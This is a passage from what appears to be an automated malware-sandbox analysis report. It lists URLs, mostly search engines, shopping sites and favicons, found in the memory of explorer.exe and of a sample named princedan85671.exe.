Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000007.00000000.2197599515.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2194841563.00000000042B3000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000007.00000000.2184596718.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpe2
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpL
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://www.opera.com0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2203531250.0000000008632000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
